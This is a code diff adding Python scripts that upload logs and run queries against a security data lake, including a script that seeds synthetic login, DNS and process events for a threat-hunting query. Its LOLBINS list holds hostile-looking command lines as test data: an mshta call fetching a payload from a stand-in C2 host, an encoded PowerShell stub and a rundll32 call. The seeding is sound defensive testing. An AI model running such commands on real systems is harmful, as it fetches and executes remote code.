+def _clean_attrs(rec: dict) -> dict:
+    """Return a copy of *rec* that holds only JSON-safe primitive values.
+
+    SDL silently rejects events that contain `null` attribute values
+    (the call returns status=success but bytesCharged=0 and the event is
+    not queryable), so those keys are dropped. Remaining values are coerced:
+
+      * bool           -> "true" / "false" (checked before int, because
+                          bool is an int subclass)
+      * NaN / +-inf    -> their string form, since JSON has no encoding
+                          for non-finite numbers
+      * int/float/str  -> unchanged
+      * anything else  -> JSON string via json.dumps(..., default=str)
+    """
+    import math  # local import: only needed for the non-finite float check
+
+    out: dict = {}
+    for k, v in rec.items():
+        if v is None:
+            continue
+        if isinstance(v, bool):
+            out[k] = str(v).lower()       # SDL stores bools as strings reliably
+        elif isinstance(v, float) and not math.isfinite(v):
+            out[k] = str(v)               # "nan" / "inf" / "-inf"
+        elif isinstance(v, (int, float, str)):
+            out[k] = v
+        else:
+            # dict/list -> JSON string
+            out[k] = json.dumps(v, default=str)
+    return out
+
+
+def upload_logs(body: str, server_host: str = "kql-proof",
+                logfile: str = "kql-proof.jsonl",
+                parser: str = "json") -> dict:
+    """POST raw text *body* to /api/uploadLogs with the write key.
+
+    *parser*, *server_host* and *logfile* are sent as the `parser`,
+    `server-host` and `logfile` request headers. Returns the decoded JSON
+    response, or an error dict (HTTP status plus the first 500 characters
+    of the body) when the response is not JSON.
+    """
+    response = requests.post(
+        f"{BASE}/api/uploadLogs",
+        data=body.encode(),
+        headers={
+            "Authorization": f"Bearer {WRITE_KEY}",
+            "Content-Type": "text/plain",
+            "parser": parser,
+            "server-host": server_host,
+            "logfile": logfile,
+        },
+        timeout=TIMEOUT,
+        verify=VERIFY,
+    )
+    try:
+        decoded = response.json()
+    except ValueError:
+        decoded = {"status": "error",
+                   "http_status": response.status_code,
+                   "raw": response.text[:500]}
+    return decoded
+
+
+def ingest_jsonl(jsonl_path: Path, run_id: str | None = None,
+                 batch_lines: int = 2000) -> tuple[int, str]:
+    """Ingest the entire JSONL via uploadLogs.
+
+    Every record is stamped with ``proof_run_id`` (the given *run_id*, or a
+    fresh ``run-<hex>`` id) so later PowerQueries can scope to one run.
+    Records are uploaded in batches of at most *batch_lines* lines.
+
+    The file is decoded as UTF-8 and read line by line. Unlike
+    ``str.splitlines()``, iterating the file only breaks on real newlines,
+    so a record containing e.g. a raw U+2028 inside a string is not cut in
+    half.
+
+    Returns:
+        (events_sent, run_id)
+
+    Raises:
+        RuntimeError: if uploadLogs answers a batch with a status other
+            than "success".
+    """
+    run_id = run_id or f"run-{uuid.uuid4().hex[:10]}"
+    sent = 0
+    buf: list[str] = []
+
+    def flush() -> None:
+        """Upload the buffered lines as one batch and reset the buffer."""
+        nonlocal sent
+        if not buf:
+            return
+        r = upload_logs("\n".join(buf))
+        if r.get("status") != "success":
+            raise RuntimeError(f"uploadLogs rejected batch: {r}")
+        sent += len(buf)
+        buf.clear()
+
+    with jsonl_path.open(encoding="utf-8") as fh:
+        for line in fh:
+            if not line.strip():
+                continue
+            rec = json.loads(line)
+            rec["proof_run_id"] = run_id
+            buf.append(json.dumps(rec, default=str))
+            if len(buf) >= batch_lines:
+                flush()
+    flush()  # upload the final partial batch, if any
+    return sent, run_id
+
+
+# --- powerQuery ------------------------------------------------------------
+def power_query(query: str,
+                start_time: str | int = "7d",
+                end_time: str | int | None = None) -> dict:
+    """POST *query* to /api/powerQuery with the read key.
+
+    *start_time* is always sent (as a string). *end_time* is sent only when
+    it is not None. Returns the response dict from _post.
+    """
+    request_body: dict = {"query": query}
+    request_body["startTime"] = str(start_time)
+    if end_time is None:
+        return _post("/api/powerQuery", request_body, READ_KEY)
+    request_body["endTime"] = str(end_time)
+    return _post("/api/powerQuery", request_body, READ_KEY)
@@ -0,0 +1,141 @@
+#!/usr/bin/env python3
+"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
+
+The 90-day Okta+DNS+Process hunt joins three event families on
+(userName, host). To make the query return at least one row at
+startTime="2h", we ingest a small batch of events for two
+user/host pairs that satisfy all three legs of the join inside
+the last 2h window.
+
+Events use SDL dotted-key JSON (the SDL `json` parser indexes
+nested fields so queries can reference `event.login.userName`,
+`dns.question.name`, `src.process.cmdline`, etc., as written
+in the example PQ).
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import upload_logs, power_query  # noqa: E402
+
+
+NOW = datetime.now(timezone.utc).replace(microsecond=0)
+
+
+def iso(dt: datetime) -> str:
+    """Format *dt* as ``YYYY-MM-DDTHH:MM:SS.000Z``.
+
+    The fractional part is always the literal ``.000`` and the ``Z`` suffix
+    is appended without any timezone conversion.
+    """
+    layout = "%Y-%m-%dT%H:%M:%S.000Z"
+    return dt.strftime(layout)
+
+
+def in_recent(seconds_ago: int) -> datetime:
+    """Return the moment *seconds_ago* seconds before the module anchor NOW."""
+    offset = timedelta(seconds=seconds_ago)
+    return NOW - offset
+
+
+PAIRS = [
+    ("alice@contoso.com", "host-alpha"),
+    ("bob@contoso.com",   "host-bravo"),
+]
+BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
+LOLBINS = [
+    "powershell -enc JABm...",
+    "rundll32.exe shell32,Control_RunDLL",
+    "mshta.exe http://c2.example.com/p.hta",
+]
+
+
+def build_events(run_id: str) -> list[dict]:
+    """Build the synthetic events for every (user, host) pair in PAIRS.
+
+    Each event is a FLAT dict whose keys contain literal dots (e.g.
+    `"event.category"` rather than nested `{"event":{...}}`). The example
+    PQ refers to those dotted names directly; the original author notes
+    this was proven by harness/probe_dotted_keys.py.
+
+    Per pair, in order: 3 failed logins, one DNS event per BAD_DOMAINS
+    entry and one process event per LOLBINS entry. The first event is 60 s
+    before NOW and each following event is 30 s older than the previous.
+
+    `event.login.loginIsSuccessful` is emitted as the literal string
+    `"false"`, so the example filters with
+    `event.login.loginIsSuccessful = 'false'`.
+    """
+    events: list[dict] = []
+    age_sec = 60
+
+    def common_fields() -> dict:
+        """Fields shared by every event; moves the clock back by 30 s."""
+        nonlocal age_sec
+        when = in_recent(age_sec)
+        age_sec += 30
+        return {
+            "TimeGenerated": iso(when),
+            "ts_epoch_ms": int(when.timestamp() * 1000),
+            "proof_run_id": run_id,
+        }
+
+    for user, host in PAIRS:
+        # ---- failed signins  (event.category='logins')
+        for _ in range(3):
+            events.append({
+                **common_fields(),
+                "event.category": "logins",
+                "event.login.userName": user,
+                "event.login.loginIsSuccessful": "false",
+                "endpoint.name": host,
+            })
+        # ---- bad DNS  (event.type='DNS Resolved')
+        for domain in BAD_DOMAINS:
+            events.append({
+                **common_fields(),
+                "event.type": "DNS Resolved",
+                "dns.question.name": domain,
+                "endpoint.name": host,
+                "src.endpoint.user.name": user,
+            })
+        # ---- suspicious process  (event.type='Process Creation')
+        for cmdline in LOLBINS:
+            events.append({
+                **common_fields(),
+                "event.type": "Process Creation",
+                "endpoint.name": host,
+                "src.process.cmdline": cmdline,
+                "src.process.user": user,
+            })
+    return events
+
+
+def main() -> int:
+    """Upload the synthetic events, wait for indexing, record the run id.
+
+    Returns 1 when uploadLogs does not report success, otherwise 0 (also
+    when the indexing poll times out). The run id is written to
+    sample_data/runnable_examples_run_id.txt.
+    """
+    run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
+    events = build_events(run_id)
+    expected = len(events)
+    body = "\n".join([json.dumps(e, default=str) for e in events])
+    print(f"[seed_runnable_examples] events  = {expected}")
+    print(f"[seed_runnable_examples] run_id  = {run_id}")
+    print(f"[seed_runnable_examples] anchor  = {NOW.isoformat()}")
+
+    upload_resp = upload_logs(body, server_host="kql-proof",
+                              logfile="runnable-examples.jsonl", parser="json")
+    if upload_resp.get("status") != "success":
+        print(f"uploadLogs rejected: {upload_resp}")
+        return 1
+
+    # Poll until indexed (use proof_run_id which is unique per run).
+    count_query = f"proof_run_id='{run_id}' | group n=count()"
+    indexed = False
+    print("Waiting for indexing", end="", flush=True)
+    for _ in range(30):
+        time.sleep(2)
+        values = power_query(count_query, "30m").get("values") or []
+        first_row = values[0] if values else None
+        if first_row and first_row[0] is not None:
+            seen = int(first_row[0])
+        else:
+            seen = 0
+        print(f" {seen}", end="", flush=True)
+        if seen >= expected:
+            indexed = True
+            break
+    print("  ✓ ready" if indexed else "  (timeout, continuing)")
+
+    marker_file = ROOT / "sample_data" / "runnable_examples_run_id.txt"
+    marker_file.write_text(run_id)
+    print(f"Wrote {marker_file}")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+"""Minimal PowerQuery smoke test against SDL."""
+import sys, json, time
+from pathlib import Path
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+# harness/sdl_client.py defines no `power_query_long_running`; importing that
+# name made this script fail with ImportError before sending any request.
+from harness.sdl_client import power_query
+
+NOW_MS = int(time.time() * 1000)
+START = NOW_MS - 30 * 24 * 3600 * 1000  # 30d back
+END = NOW_MS
+
+
+def _summary(resp: dict) -> str:
+    """Dump *resp* as JSON, replacing `values` with a row-count placeholder."""
+    return json.dumps(
+        {k: (v if k != 'values' else f'<{len(v or [])} rows>')
+         for k, v in resp.items()},
+        indent=2, default=str)
+
+
+q = "dataset='kql-proof' | group n = count() by event_type"
+print(f"Query: {q}")
+print(f"Window: {START} .. {END}")
+t0 = time.time()
+r = power_query(q, START, END)
+print(f"Initial response in {time.time()-t0:.2f}s:")
+print(_summary(r))
+if r.get("continuationToken") or r.get("token"):
+    # The client has no polling helper, so only report the situation.
+    print("\nResponse carries a continuation token; "
+          "the result above may be incomplete (polling is not implemented).")
+print("\nColumns:", r.get("columns"))
+print("First 20 values:", (r.get("values") or [])[:20])
@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+"""Pretty-print the PROOF.json summary as a table."""
+import json
+from pathlib import Path
+
+p = Path(__file__).resolve().parents[1] / "reports" / "PROOF.json"
+data = json.loads(p.read_text())
+local = data["local"]
+pq = data.get("pq") or {}
+
+print(f"{'Rule':<46} {'Ref rows':>9} {'SDL rows':>9} {'Status':<10}")
+print("-" * 80)
+# Status only reflects whether SDL returned rows; it does not compare keys.
+ok_count = empty_count = err_count = 0
+for rid, ref in local.items():
+    entry = pq.get(rid) or {}
+    if not pq:
+        # No PQ section at all: the proof was local-only.
+        status, sdl_n = "—", "n/a"
+    elif not entry.get("ok"):
+        status, sdl_n = "ERROR", "?"
+        err_count += 1
+    else:
+        sdl_n = entry.get("rowcount", 0)
+        if sdl_n > 0:
+            status = "OK"
+            ok_count += 1
+        else:
+            status = "EMPTY"
+            empty_count += 1
+    print(f"{rid:<46} {ref['n']:>9} {str(sdl_n):>9} {status:<10}")
+print("-" * 80)
+if pq:
+    print(f"OK: {ok_count}   EMPTY: {empty_count}   ERROR: {err_count}")
+print("\nFull report: reports/PROOF.md")
@@ -0,0 +1,62 @@
+#!/usr/bin/env python3
+"""Try /api/uploadLogs as an alternative to addEvents. We POST each line of
+the JSONL as a raw event - SDL's json parser will extract fields automatically.
+
+Per docs: max 6 MB per request, 10 GB/day per tenant, parser=json supports
+auto-flattening of all keys."""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from pathlib import Path
+
+import requests
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+CFG = json.loads((ROOT / "config.json").read_text())
+
+BASE = CFG["base_url"].rstrip("/")
+WRITE = CFG["log_write_key"]
+
+JSONL = ROOT / "sample_data" / "events.jsonl"
+
+PROBE = uuid.uuid4().hex[:8]
+print(f"probe = {PROBE}")
+
+# Stamp each line with the probe marker
+lines = []
+for line in JSONL.read_text().splitlines():
+    if not line.strip():
+        continue
+    rec = json.loads(line)
+    rec["upload_probe"] = PROBE
+    lines.append(json.dumps(rec))
+body = "\n".join(lines)
+payload = body.encode()  # encode once; the printed size is the real byte count
+print(f"body size = {len(payload)} bytes ({len(lines)} lines)")
+
+headers = {
+    "Authorization": f"Bearer {WRITE}",
+    "Content-Type": "text/plain",
+    "parser": "json",
+    "server-host": "kql-proof",
+    "logfile": "kql-proof.jsonl",
+}
+# Use the same TLS-verification and timeout settings from config.json that
+# harness.sdl_client applies to the follow-up query below.
+r = requests.post(f"{BASE}/api/uploadLogs",
+                  data=payload, headers=headers,
+                  timeout=CFG.get("timeout_seconds", 120),
+                  verify=CFG.get("verify_tls", True))
+print(f"HTTP {r.status_code} -> {r.text[:500]}")
+
+print("\nWaiting 15 s ...")
+time.sleep(15)
+
+# Query for the probe value
+from harness.sdl_client import power_query
+q = f"upload_probe='{PROBE}' | group n=count() by event_type"
+res = power_query(q, "30m")
+print(f"\nQuery result: matching={res.get('matchingEvents')}")
+cols = [c.get("name") if isinstance(c, dict) else c for c in (res.get("columns") or [])]
+for row in res.get("values") or []:
+    print(f"  {dict(zip(cols, row))}")
@@ -0,0 +1,92 @@
+#!/usr/bin/env python3
+"""Independent post-export verification.
+
+Reads every file in `pq/` AS WRITTEN ON DISK (no template substitution,
+no scope prefix, no harness magic; only `//` comment lines are removed)
+and POSTs it to /api/powerQuery on the configured tenant. The script
+asserts each file:
+
+  * parses cleanly (no 'error/client/badParam' status),
+  * returns a syntactically valid response (status='success').
+
+It does NOT assert that the query returns any rows — empty results are
+fine. The purpose is to catch syntax / field / function errors so the
+published .pq files are guaranteed runnable by anyone who copies them.
+"""
+from __future__ import annotations
+
+import re
+import sys
+import time
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query  # noqa: E402
+
+# Directory holding the exported .pq files; they are processed in sorted
+# path order.
+PQ_DIR = ROOT / "pq"
+files: list[Path] = sorted(PQ_DIR.glob("*.pq"))
+
+
+def strip_comments(text: str) -> str:
+    """Return *text* without its `//` comment lines.
+
+    A line is dropped when its first non-whitespace characters are `//`.
+    The remaining lines are re-joined with newlines and the result is
+    stripped of leading and trailing whitespace.
+    """
+    kept = []
+    for row in text.splitlines():
+        if row.lstrip().startswith("//"):
+            continue
+        kept.append(row)
+    return "\n".join(kept).strip()
+
+
+def collapse_whitespace(body: str) -> str:
+    """Return *body* as a single line with whitespace runs squeezed.
+
+    Every run of whitespace (newlines included) becomes one space and the
+    ends are trimmed. This mimics pasting the query into a web textbox
+    that strips newlines: a well-formed PQ still has a `|` between every
+    pair of stages afterwards and must therefore keep working.
+    """
+    squeezed = re.sub(r"\s+", " ", body)
+    return squeezed.strip()
+
+
+# Announce the run, followed by one blank separator line.
+for banner in (
+    f"Verifying {len(files)} .pq files run cleanly on SDL ...",
+    "(Each file tested in TWO forms: as-written and whitespace-collapsed.)",
+    "",
+):
+    print(banner)
+
+# Outcome accumulators filled in by run() and by the main loop below.
+passed: list[str] = []
+failed: list[tuple[str, str, str]] = []  # (file, variant, reason)
+
+
+def run(name: str, variant: str, body: str) -> bool:
+    """Execute one query variant via ``power_query`` and record the outcome.
+
+    Args:
+        name: File name of the .pq file, used only for reporting.
+        variant: Label of the form under test ("as-written" or "collapsed").
+        body: Query text handed to ``power_query`` with a "2h" start time.
+
+    Returns:
+        True when the response status is "success", False otherwise. Every
+        failure is printed and appended to the module-level ``failed`` list
+        as ``(name, variant, reason)``.
+    """
+    # Monotonic clock: elapsed time is not skewed by wall-clock adjustments.
+    t0 = time.perf_counter()
+    try:
+        r = power_query(body, start_time="2h")
+    except Exception as e:  # boundary: one failing query must not abort the run
+        # Report immediately, like the status-failure path below, so the
+        # per-file progress output shows every failure.
+        print(f"  ✗ {name:<48} [{variant:<9}] exception :: {e}")
+        failed.append((name, variant, f"exception: {e}"))
+        return False
+    elapsed = time.perf_counter() - t0
+    status = r.get("status", "")
+    if status == "success":
+        matching = r.get("matchingEvents", 0)
+        print(f"  ✓ {name:<48} [{variant:<9}] "
+              f"matching={matching} ({elapsed:.1f}s)")
+        return True
+    # `or ""` also covers a message key that is present but None.
+    msg = str(r.get("message") or "")[:200]
+    print(f"  ✗ {name:<48} [{variant:<9}] {status} :: {msg}")
+    failed.append((name, variant, f"{status}: {msg}"))
+    return False
+
+
+# A verification run that checked nothing must not look like a success.
+if not files:
+    print(f"No .pq files found in {PQ_DIR}")
+    sys.exit(1)
+
+for pq_file in files:
+    text = pq_file.read_text(encoding="utf-8")
+    body = strip_comments(text)
+    if not body:
+        # Nothing left to send: report it inline and move on to the next file.
+        print(f"  ✗ {pq_file.name:<48} [{'as-written':<9}] "
+              "empty after stripping comments")
+        failed.append((pq_file.name, "as-written",
+                       "empty after stripping comments"))
+        continue
+
+    # Both variants are always executed so the report covers each form;
+    # a file passes only when both succeed.
+    ok1 = run(pq_file.name, "as-written", body)
+    ok2 = run(pq_file.name, "collapsed", collapse_whitespace(body))
+    if ok1 and ok2:
+        passed.append(pq_file.name)
+
+# Summary: PASS counts files, FAIL counts failed (file, variant) runs.
+print()
+print(f"PASS: {len(passed)}    FAIL: {len(failed)}")
+if failed:
+    print()
+    print("Failed queries:")
+    for name, variant, why in failed:
+        print(f"  {name} [{variant}]: {why}")
+    sys.exit(1)